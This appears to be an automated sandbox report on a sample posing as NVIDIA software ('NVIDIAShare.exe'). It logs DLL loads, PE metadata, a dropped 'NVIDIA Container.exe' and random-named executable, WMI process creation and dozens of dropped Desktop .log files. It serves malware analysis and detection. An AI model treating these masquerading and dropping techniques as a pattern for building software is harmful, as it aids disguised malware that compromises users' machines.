                                  Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ktmw32.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wbemcomn.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: amsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasapi32.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasman.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rtutils.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: winhttp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasadhlp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dlnashext.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wpdshext.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: slc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ktmw32.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wbemcomn.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: amsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasapi32.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasman.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rtutils.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: winhttp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasadhlp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: NVIDIAShare.exe.bin.exeStatic file information: File size 2356395 > 1048576
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: NVIDIAShare.exe.bin.exe
                                  Source: Binary string: System.Windows.Forms.pdb source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2161092207.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2892138201.000000001B460000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2306608132.000000001B4B5000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: 7..pDb source: NVIDIA Container.exe, 00000005.00000002.2129474262.00007FF8493E0000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: System.pdb source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2306608132.000000001B4B5000.00000004.00000020.00020000.00000000.sdmp
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\NVIDIA\__tmp_rar_sfx_access_check_4291421Jump to behavior
                                  Source: NVIDIAShare.exe.bin.exeStatic PE information: section name: .didat
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0101F640 push ecx; ret 0_2_0101F653
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0101EB78 push eax; ret 0_2_0101EB96
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeCode function: 5_2_00007FF8490C22B3 push eax; retf 5_2_00007FF8490C22B7
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeCode function: 5_2_00007FF849172025 push E8FFFE49h; retf 5_2_00007FF849172031
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeCode function: 5_2_00007FF8491762CA push eax; ret 5_2_00007FF8491762CD
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F4C8A6 push esi; retf 12_2_00007FF848F4C8A7
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F4C4AB push ecx; iretd 12_2_00007FF848F4C4AC
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F2C5A0 push es; iretd 12_2_00007FF848F2C5A7
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF8490E6299 push edx; ret 12_2_00007FF8490E62CB
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF8490C22B3 push eax; retf 12_2_00007FF8490C22B7
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF849172025 push E8FFFE49h; retf 12_2_00007FF849172031
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF8491762CA push eax; ret 12_2_00007FF8491762CD
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F4C8A6 push esi; retf 14_2_00007FF848F4C8A7
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F4C4AB push ecx; iretd 14_2_00007FF848F4C4AC
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F2349C push E8FFFFFFh; retf 14_2_00007FF848F234A1
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 14_2_00007FF848F2C5A0 push es; iretd 14_2_00007FF848F2C5A7
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F2C5A0 push es; iretd 19_2_00007FF848F2C5A7
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F4C8A6 push esi; retf 19_2_00007FF848F4C8A7
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F4C4AB push ecx; iretd 19_2_00007FF848F4C4AC
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 19_2_00007FF848F2349C push E8FFFFFFh; retf 19_2_00007FF848F234A1
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 21_2_00007FF8490E22B3 push eax; retf 21_2_00007FF8490E22B7
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 21_2_00007FF8491962CA push eax; ret 21_2_00007FF8491962CD
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 21_2_00007FF849192028 push E8FFFE49h; retf 21_2_00007FF849192031
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F4C8A6 push esi; retf 26_2_00007FF848F4C8A7
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F4C4AB push ecx; iretd 26_2_00007FF848F4C4AC
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF848F2C5A0 push es; iretd 26_2_00007FF848F2C5A7
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF8490C22B3 push eax; retf 26_2_00007FF8490C22B7
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF8490E6299 push edx; ret 26_2_00007FF8490E62CB
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF849172025 push E8FFFE49h; retf 26_2_00007FF849172031
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 26_2_00007FF8491762CA push eax; ret 26_2_00007FF8491762CD
                                  Source: NVIDIA Container.exe.0.drStatic PE information: section name: .text entropy: 7.545779635651326
                                  Source: hBoBqOIwjXsCbkOMEKwZ.exe.5.drStatic PE information: section name: .text entropy: 7.545779635651326

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\HbFMikPW.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile created: C:\Users\user\Desktop\AVNUZtIi.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\UCVIiXUm.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\fjyPCrNn.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\NBjcEgcI.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\OOMCloya.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\XOysNJXm.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\TMLKnwYz.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\PszJebvu.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\TxJtcnQc.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\DaiMBcDs.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile created: C:\Users\user\Desktop\ShoatPdx.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\hxRHxlcT.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\zwfUdEOY.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\VAeASPIF.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\JOqdsLLu.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\DSPMVDWa.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\JesvDTTS.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\chLhgIIs.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\oSRflUSV.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\xYhnoKfH.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\JfykNhTG.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\pAbpDGmk.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\skLfaCLK.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\TAxSAtpp.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\AAjFTaDk.logJump to dropped file
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\snUoPbCy.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\CTevJfQr.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile created: C:\Users\user\Desktop\IyVKJmYP.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\gzqzblNZ.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\qiYwETGO.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\ukwwlbRt.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\IMSbQhuH.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\cjQhkVuX.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\BlhnJSvN.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\LxmktYfY.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile created: C:\Users\user\Desktop\GwjbnDUU.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\XwgSVREI.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\AOEnQqnj.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\DnVLkBOS.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile created: C:\Users\user\Desktop\GwjbnDUU.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile created: C:\Users\user\Desktop\ShoatPdx.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile created: C:\Users\user\Desktop\IyVKJmYP.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile created: C:\Users\user\Desktop\AVNUZtIi.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\UCVIiXUm.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\DnVLkBOS.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\JfykNhTG.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\zwfUdEOY.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\qiYwETGO.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\LxmktYfY.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\CTevJfQr.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\skLfaCLK.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\PszJebvu.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\cjQhkVuX.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\TAxSAtpp.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\IMSbQhuH.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\chLhgIIs.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\oSRflUSV.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile created: C:\Users\user\Desktop\fjyPCrNn.logJump to dropped file
